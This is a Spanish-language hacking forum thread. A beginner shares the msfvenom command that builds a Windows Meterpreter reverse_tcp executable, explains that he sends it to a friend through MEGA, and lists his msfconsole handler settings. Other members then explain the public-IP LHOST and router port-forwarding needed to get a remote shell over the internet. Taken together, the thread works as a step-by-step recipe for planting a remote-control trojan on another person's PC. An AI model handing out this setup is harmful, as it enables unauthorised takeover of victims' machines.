Hola amigos, tengo una enorme duda, y es que estos días he intentado hacer una prueba de ataque fuera de LAN con un amigo, la cosa es que el al abrir el archivo no se me genera una sesión en Meterpreter
El payload lo hago con msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=mi no-ip LPORT=443 R > app.exe
Mi compañia es VTR y mi router es ARRIS, tengo el firewall activado y el puerto 443 abierto con mi IP Local. (no se si hay que abrir otro puerto, soy muy nuevo en esto.
Luego le paso el .exe a mi amigo por MEGA
En msfconsole pongo:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST: mi IP Local (si pongo la no-ip me da error y me la cambia por 0.0.0.0)
set LPORT: 443
exploit
luego mi amigo abre el .exe pero nunca se inicia una sesion por lo que no tengo control de su maquina.
otro dato es que en LHOST pongo mi ip de eth0 ya que la de wlan0 no me sale porque no tengo adaptador, no se si eso influya.
Por favor denme recomendaciones o simplemente diganme que hago mal, Gracias de antemano ;)
supongo que si has puesto tu direccion de eth0 habras puesto la privada dentro de tu lan ejemplo 192.168.... cuando deberias poner tu ip publica (la de tu router hacia el exterior) y luego hacer port forwarding. yo te recomiendo que estudies un poco de redes y de todos los campos en general antes de chatarrear. Si no pierde la gracia o eso pienso yo.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
supongo que si has puesto tu direccion de eth0 habras puesto la privada dentro de tu lan ejemplo 192.168.... cuando deberias poner tu ip publica (la de tu router hacia el exterior) y luego hacer port forwarding. yo te recomiendo que estudies un poco de redes y de todos los campos en general antes de chatarrear. Si no pierde la gracia o eso pienso yo.
Pongo la IP Privada en los Puertos
pero en el reverse_tcp pongo mi direccion no-ip
y a la hora de abrir el metasploit utilizo mi IP Privada (Si pongo mi IP Publica me pone 0.0.0.0 y también me gustaría saber porque)
Y otra cosa, donde puedo leer sobre redes?
En este foro hay un montón de subforos y talleres en los que hay muchisima info, aprovechala.
saludos
Hola @Prometheus (https://underc0de.org/foro/index.php?action=profile;u=66681), la ip privada debes colocar en el port forward (en el router).
Ten en cuenta que cuando realizas el seteo en metasploit debes considerar lo siguiente:
set LHOST: "Ip pública"
set LPORT: "Puerto a redirigir"
Ya que es lo que envías, y en el router debes realizar el port-forwarding de la siguiente manera:
Ip Privada: "Ip de tu pc"
Puerto : "puerto donde tienes la sesión en escucha"
Tambien, pasa por el siguiente post: https://underc0de.org/foro/hacking/t32797/ te servira de guía.
Saludos !
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola @Prometheus (https://underc0de.org/foro/index.php?action=profile;u=66681), la ip privada debes colocar en el port forward (en el router).
Ten en cuenta que cuando realizas el seteo en metasploit debes considerar lo siguiente:
set LHOST: "Ip pública"
set LPORT: "Puerto a redirigir"
Ya que es lo que envías, y en el router debes realizar el port-forwarding de la siguiente manera:
Ip Privada: "Ip de tu pc"
Puerto : "puerto donde tienes la sesión en escucha"
Tambien, pasa por el siguiente post: https://underc0de.org/foro/hacking/t32797/ te servira de guía.
Saludos !
Ah vale, muchas gracias, esto es lo que necesitaba, saber donde va cada cosa